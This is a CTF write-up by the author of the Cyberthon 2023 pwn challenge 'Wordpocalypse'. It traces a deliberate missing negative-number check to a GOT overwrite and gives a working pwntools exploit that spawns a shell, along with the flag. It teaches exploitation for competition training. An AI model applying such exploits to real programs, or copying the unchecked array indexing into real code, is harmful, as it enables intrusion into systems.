Cyberthon 2023 Pwn Challenge — Wordpocalypse

Jin Kai
CSIT tech blog
Published in
10 min readSep 7, 2023

Cyberthon is a cybersecurity competition organised by Hwa Chong Institution (College Section), in collaboration with the Centre for Strategic Infocomm Technologies (CSIT) and Digital and Intelligence Service (DIS).

Cyberthon is targeted at students in (the equivalent of) Junior College/Centralised Institute Year 1 to Year 3, and it features cybersecurity and data science training for JC students over the span of 1 month with a 8-hour long Capture The Flag (CTF) competition at the end.

I created a Pwn challenge for this year’s Cyberthon, Wordpocalypse, which was named after the popular ‘Wordle’ game and the theme of the competition which was ‘Apocalypse’.

The Challenge

Our agent has found a backdoor into a crucial APOCALYPSE infrastructure… except that it is blocked by a firewall, disguised by a wordle-like game. Can you help us to break in and retrieve the secrets within?

For this challenge, participants were provided with a challenge.zip which contains the vulnerable program, source code, as well as the dynamically loaded libraries for the program. (the libraries are provided to minimize problems with the participant’s environment and can be ignored)

files provided to the participants
files distributed for the challenge

Upon executing the binary, we are provided with a menu that prompts us for the number of attempts we require for the wordle game. After which, we are provided with a simple interface to make some guesses and the program will terminate afterwards.

prompt for number of attempts
an initial run of the program
wordle interface
the game interface of the binary
console output after losing the wordle game

Now that we have established the basic functionality of the program, we will attempt to do some vulnerability analysis to find the vulnerability in this program.

Vulnerability Analysis

With the files provided for the challenge, there are two ways to poke at the program for vulnerabilities.

  1. Black Box Analysis (naive but potentially quick results)
  2. Static Analysis (more troublesome but also more reliable)

We will explore the use of both methods together to quickly find our vulnerability.

BLACK BOX ANALYSIS

Black box analysis is really straightforward. We will just play around with the program and think of different ways to provide possibly unsanitized input or hit edge cases in our program until we find some buggy behaviour in the program.

negative number of attempts as a form of unsanitized input
a negative input causes the program to crash

As you can see above, by providing a negative number of attempts, we are able to play the wordle game to make some guesses but our program would suddenly crash with a Segmentation Fault (our program tried to access some memory that does not exist).

This is really promising for us, as it means that we might’ve found an exploitable bug in the program. However, we will still need to spend some more effort triaging this crash to understand why it happens and whether we are able to leverage this bug to possible achieve code execution. This is where our source code analysis will come in.

STATIC ANALYSIS

Since we are provided with the source code in this challenge, we can directly analyze it. (typically if we do not have the source code, we will have to use disassemblers/decompilers such as IDA or ghidra, to produce assembly or pseudocode that we can use to statically analyze)

By trivially scrolling through the chunk of code, we can find some interesting stuff in the code instantly.

The program seems to have a win function that is not called anywhere else. If we can somehow call this function, we will be able to obtain a shell on the remote server and obtain our flag.

void win() {
printf("%s%s%s", ARED, "A qualified agent... welcome to APOCALYPSE. Hope you didn't destroy too much ony our way here >:)", ARST);
endwin();
system("/bin/sh"); // give us a SHELL
exit(0);
}

Now we will move on to read and understand the main flow of the program. Every program starts execution from the main function

void __attribute__((noreturn)) main() {

int opt = 0;
setup(); // disable buffering etc (can be ignored)
menu(); // prints menu
printf("Choice: ");
scanf("%d", &opt);
getchar();
switch (opt) {
case 1:
printf("Show us you are worthy.\n");
printf("How many attempts do you need: ");
scanf("%d", &opt);
getchar();
printf("\n");
if (opt > 5) {
puts("Apocalypse agents can do better than that.");
exit(0);
}
init_wordle(opt);
exit(0);
case 2:
printf("\nKnowing %swhen to quit%s is commendable.\n", ARED, ARST);
exit(0);
default:
printf("Don't try to cheat us.\n");
exit(0);
}
}

As you can see in the main function, the user is prompted the first time to start the game, and then prompted again for the number of attempts required.

The program checks the upper bounds by checking that the user provides no more than 5 attempts. It then passes the value into a function called init_wordle().

(if you have a keen eye, you might’ve spotted a potential problem already!)

#define MAX_ATTEMPTS 5
char wordle_board[MAX_ATTEMPTS*5] = { 0 };

// i've commented out the less relevant parts of the code
void init_wordle(int attempts) {

...
for (int i = attempts; i != 0; i -= 1) {
if (next_guess(wordle_board+(i*5))) {
attron(COLOR_PAIR(RED));
mvprintw(centre_y, centre_x+11, " YOU WIN! ");
mvprintw(centre_y+1, centre_x +2, " PRESS ANY KEY TO CONTINUE... ");
attroff(COLOR_PAIR(RED));
refresh();
getch();
endwin();
return;
}
}
...
return;
}

Within the init_wordle() function, we see that we enter a for loop that calls the next_guess function to take in the next guess from the user for number of times that the user specified in attempts.

We also see that the next_guess function takes in an index of wordle_board as an argument, which is defined to be a character array of 25 characters. (since each word is 5 character, and a user should only be able to guess a maximum of 5 words).

char correct_word[] = "havoc";

int next_guess(char* buf) {
...
int i = 0;
int ch = 0;
while (i < 5) {
i += 1;
ch = wgetch(win); // gets character asinput

// this entire if-loop accounts for user inputting a backspace character
if (ch == 127 || ch == KEY_BACKSPACE || ch == KEY_DC) {
if (i > 1) {
i -= 2;
mvwaddch(win, 1, 5*(i+1), '_');
} else if (i == 1) {
i -= 1;
}
} else {
mvwaddch(win, 1, 5*i, ch);
buf[i-1] = ch; // save input into wordle_board
}
wrefresh(win);
}

int correct = 0;

// now we check if the word is correct
for (int i = 0; i < 5; i += 1) {
if (correct_word[i] == buf[i]) {
wattron(win, COLOR_PAIR(GREEN));
mvwaddch(win, 1, 5*(i+1), buf[i]);
wattroff(win, COLOR_PAIR(GREEN));
correct += 1;
} else {
wattron(win, COLOR_PAIR(RED));
mvwaddch(win, 1, 5*(i+1), buf[i]);
wattroff(win, COLOR_PAIR(RED));
}
wrefresh(win);
}

// if the entire word matches the correct_word
if (correct == 5) {
return 1;
}
return 0;
}

Within the next_guess function, we see that the user’s input is saved into the offset of wordle board that is passed in as an argument (buf) and the inputted word is checked against correct_word, which is “havoc”.

correct word is “havoc”

Hopefully I haven’t lost you yet — let’s go through a very short summary of our key findings about the program flow so far:

  1. Prompt user to start the game
  2. Prompt user for number of attempts required
  3. Check that number of attempts is not more than 5
  4. Receive guesses from user, and place it into an offset of wordle_board
  5. If the guess matches the correct word which is havoc, we will stop receiving more guesses and end the program

Now if we think back about our black-box analysis, our program crashed when we provided the number of attempts as -1.

We can see that this is because there is insufficient sanitization of input in the program. Although we may have checked the upper bounds of the number of attempts to be not more than 5, we did not check whether the number of attempts inputted is negative.

This caused the received guesses from the user to be copied into a negative offset from wordle_board, which causes the program to write out of bounds of the array, which caused something in the program to break and crash.

This means that we have essentially found a negative array indexing — simply put, we are able to write stuff to places in memory that we are not supposed to! This is crucial, since this will allow us to overwrite key pointers that we shouldn’t and possible allow us to call the win function.

Exploit Methodology

Since the objective of the challenge is still to call the win function, let’s explore how we are able to do so.

In the previous section, we have identified that we are able to write at negative indexes of the wordle_board array. In this section, we want to identify if there are any key pointers we can overwrite in order to call the win function.

From here on, we will operate on our debugger (GDB) and dive into low-level concepts such as memory and function calls.

looking at wordle_board in memory
memory surrounding wordle_board

If we look at the memory surrounding wordle_boardarray in memory, more specifically in the lower addresses from wordle_board, we spot some pointers that end with @got.plt.

These are actually entries in the Global Offset Table (GOT), which is basically a table of function pointers that hold the addresses of functions that are dynamically linked.

The Global Offset Table

how GOT works (extracted from walkthrough slides)

When a binary attempts to call a library function (i.e. printf), it will call printf in the procedure linkage table (PLT), which basically contains some instructions that will jump to the address contained inside the printf entry in the GOT. (refer to above image).

What this means for us is that if we are able to control and corrupt the GOT entry for any function, we will be able to call any arbitrary function we like when that function is called.

assume we overwrite the entry of printf to a bunch of ‘A’s
program will crash when trying to call printf (0x4141414141414141 correspond to ‘AAAAAAAA’ in hex)

Since we can write to a negative index from wordle_board, we can possibly overwrite the GOT entry of function X to the win address, so that the win function is called when the function X is called in the binary.

If we look at the entirety of the GOT,

all imported functions in the GOT

we will want to pick out one of the entry that we will overwrite to the win function.

For this walkthrough, I chose the exit function since it seems like one of the most convenient since it is called at the end of this program.

Crafting Exploit

We can now trivialize our exploit steps to the following

  1. Find the correct negative offset to overwrite exit@got
  2. Overwrite exit@got to win function address
  3. Terminate loop and call the exit function to get our shell and win!

Finding the correct offset

We can find the offset by first obtaining the address of the wordle_board, then finding the address of exit in the GOT.

Afterwards, since each word is 5 character long, we can calculate the negative index such that the first word we write will coincide with the exit function in the GOT.

finding negative index

As we can see, our index is 36/37. By trying an index of -37 , we can see that we are able to overwrite the least significant 4 bytes in the exit function entry in the GOT. This is sufficient for us to put in our win address!

Overwriting GOT with our win address

We can firstly obtain our win address in GDB.

address of win

We can see that our win function starts at an address of 0x401476.

With this information, we can write our final exploit.

from pwn import *

p = process("./wordpocalypse")

p.sendlineafter(b"Choice: ", b"1")
p.sendlineafter(b"need: ", b"-37")

payload = b"\x00" # padding
payload += b"\x76\x14\x40\x00" # win address
payload += b"havoc" # terminate loop by providing correct word

p.sendline(payload)
p.clean() # cleanup

p.interactive()
Cyberthon{4_trU3_w0rdl3_0w0fl0w_ch4mp10n}

Summary

In this challenge, we began by analyzing the program, understanding its vulnerabilities, and identifying potential exploit opportunities. Through careful examination of the code and the execution flow, we were able to uncover an array indexing vulnerability and devise a reliable exploit strategy.

By learning about exploit techniques, we also gain insights into how to defend against them. Being aware of potential vulnerabilities helps us build more secure software and avoid similar pitfalls in our own projects.

I hope that the Cyberthon participants enjoyed playing this challenge as much as I enjoyed creating it — and most importantly, that they are able to take away something from the competition!

--

--